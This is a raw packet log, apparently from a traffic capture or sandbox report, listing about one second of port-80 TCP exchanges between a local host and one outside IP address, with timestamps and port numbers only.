Oct 3, 2022 17:42:20.460233927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460252047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460263014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460269928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460289001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460298061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460306883 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.460319996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.460355997 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487360001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487396955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487416029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487431049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487448931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487462997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487481117 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487498999 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487512112 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487525940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487544060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487555981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487562895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487577915 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487596035 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487596989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487615108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487628937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487641096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487648010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487657070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487665892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487684965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487699032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487706900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487718105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487735987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487749100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487759113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487766981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487785101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487792969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487802982 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487814903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487821102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487838030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487848043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487857103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487876892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487883091 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487896919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487910032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487926960 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487936020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487941027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487943888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487962961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487981081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.487982035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.487999916 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.488002062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.488020897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.488037109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.488040924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.488074064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.637722969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.664807081 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669107914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669137001 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669154882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669173956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669192076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669209003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669228077 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669234991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669245005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669264078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669282913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669284105 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669301987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669312000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669322014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669332027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669339895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669358015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669365883 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669377089 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669394016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669399023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669413090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669419050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669431925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669450998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669452906 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669470072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669487953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669487953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669506073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669507027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669537067 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669555902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669568062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669593096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669610023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669611931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669631004 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669634104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669651031 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669653893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669670105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669678926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669687986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669703007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669708014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669722080 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669725895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669744968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669760942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669763088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669781923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669791937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669800043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669817924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669826984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669835091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669850111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669853926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669872046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669876099 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669889927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669908047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669910908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669926882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669944048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669949055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669961929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669970036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.669980049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.669997931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670015097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670016050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670037985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670042992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670058012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670063972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670077085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670094013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670099974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670111895 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670130014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670137882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670149088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670160055 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670171022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670188904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670195103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670207977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670226097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670228004 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670244932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670253992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670264006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670284033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670288086 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670303106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670320034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670322895 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670339108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670341969 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670357943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670376062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670376062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670393944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670408010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670411110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670428991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670444965 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670445919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670464039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670478106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670481920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670500994 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670502901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670520067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670523882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670537949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670557976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670563936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670576096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670593977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670598030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670613050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670622110 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670630932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670648098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670655012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670666933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670685053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670701027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670717955 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670736074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670752048 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670762062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670768976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670787096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670803070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670820951 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670838118 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670842886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670856953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670875072 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670905113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670906067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670924902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670943022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670957088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.670960903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670980930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.670998096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.671015024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.671034098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.671039104 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.671052933 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.671072006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.671089888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.671139956 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.671212912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.696598053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.696635962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.696782112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698010921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698040962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698060036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698076963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698110104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698127985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698144913 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698163033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698183060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698183060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698183060 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698200941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698219061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698219061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698220015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698239088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698240042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698257923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698271990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698276043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698287010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698295116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698312998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698313951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698329926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698333025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698352098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698359013 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698369980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698388100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698388100 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698405981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698417902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698424101 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698441982 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698452950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698460102 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698477983 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698487043 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698496103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698509932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698514938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698532104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698549986 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698563099 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698568106 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698586941 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698595047 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698605061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698621035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698623896 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698643923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698652983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698662043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698678970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698694944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698695898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698714972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698720932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698733091 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698745966 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698751926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698770046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698774099 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698787928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698805094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698810101 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698823929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698832989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698842049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698859930 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698864937 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698889971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698898077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698909998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698929071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698931932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698947906 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698966026 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698967934 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.698983908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.698998928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699002981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699023962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699033976 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699042082 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699059963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699069023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699078083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699089050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699095964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699114084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699125051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699131966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699150085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699157000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699168921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699179888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699186087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699203968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699218035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.699223042 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699240923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.699253082 CEST	49711	80	192.168.2.6	85.31.46.167
